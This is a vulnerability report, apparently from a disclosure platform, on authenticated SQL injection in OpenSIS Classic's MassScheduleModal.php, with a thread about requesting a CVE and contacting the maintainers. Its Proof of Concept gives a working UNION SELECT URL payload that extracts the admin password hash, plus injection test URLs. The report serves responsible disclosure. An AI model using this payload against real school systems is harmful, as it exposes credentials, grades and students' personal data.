Authenticated SQL Injection in OpenSIS Classic v9.0 and earlier in os4ed/opensis-classic
Reported on
Nov 25th 2022
Description
SQL injection in OpenSIS Classic v9.0 and earlier allows remote authenticated attackers to execute SQL code via the id parameter in MassScheduleModal.php leading to full database information disclosure.
Version
At the time of reporting, the most up-to-date version of the master branch was used for testing. The latest commit was: 381a1ad. The release package 8.0 includes this vulnerability.
Edit: Since first reporting this, a new release has been published: 9.0. However, the affected files and code did not change.
Proof of Concept
- 1: Authenticate as student (or any other account)
- 2: Visit the following URL
http://<HOST>/MassScheduleModal.php?table_name=course_periods&id='+UNION+SELECT+'','','',(SELECT+CONCAT('ADMIN+HASH:+',password)+from+login_authentication+where+id=1),'','','','','','','','','','','','','','','','','','','','','','','','','','',''--+-
If error output is activated, the password hash for the first created user will be shown in the error output. If error output was disabled, attackers could still leverage blind enumeration techniques to brute force database contents.
Impact
Remote authenticated attackers can enumerate all database contents (either via reflective SQL injection when error output is enabled or by blind time-based SQL injection if it's not, for example). The database contains encrypted passwords, PII and other sensitive information such as grades.
Occurrences
MassScheduleModal.php L58
$_REQUEST[id] is passed to the SQL query without prior sanitization, making the query susceptible to SQL injection.
# POC
http://<HOST>/MassScheduleModal.php?table_name=courses&id='
MassScheduleModal.php L35
$_REQUEST[id] is passed to the SQL query without prior sanitization, making the query susceptible to SQL injection.
# POC
http://<HOST>/MassScheduleModal.php?table_name=course_periods&id='
@admin I'd also like to request a CVE for this. I verified that this vulnerability has not been covered by CVE-2021-40618, CVE-2021-40617 or CVE-2021-40309 and is neither listed on cvedetails.com nor the current github issues.
Hi crackcat! A CVE may be assigned once the maintainers determine this to be a valid vulnerability, fix it and take it public not before. OpenSIS are pretty active so if you could be patient, they'll be here any minute :)
@admin After direct communication attempts, a second vulnerability that I reported to their email has now been fixed and published with the new release: 9.0.
I tried to get a response for this report here as well, but I believe there was some sort of confusion. If possible, could you send a reminder for this report?
Can you ask them to check their dashboard or send them the link?
Hi @psmoros They cannot access the report as it's (obviously) still private, so they requested the details from me via email.
If you could please resend a magic link to the their mail address: info@os4ed.com that'd be great. Also, please add a note that this invite is in response to exactly that request made by them towards pm_security_report@proton (crackcat), if possible - to avoid any confusion.
Using a subject of "RE: Vulnerability Disclosure" might help this matter too.
@admin (in case the above mention didnt go through) On a side note, I really support the suggestion of adding emoji-responses ("Ok" "thumbs up/down" for example, to indicate that a message was read or acknowledged)
Hey crackcat, a magic link has now been sent to the email address provided!
As for your emoji-reaction feature request, it is something we are looking to add on to in the future.
Happy hunting:)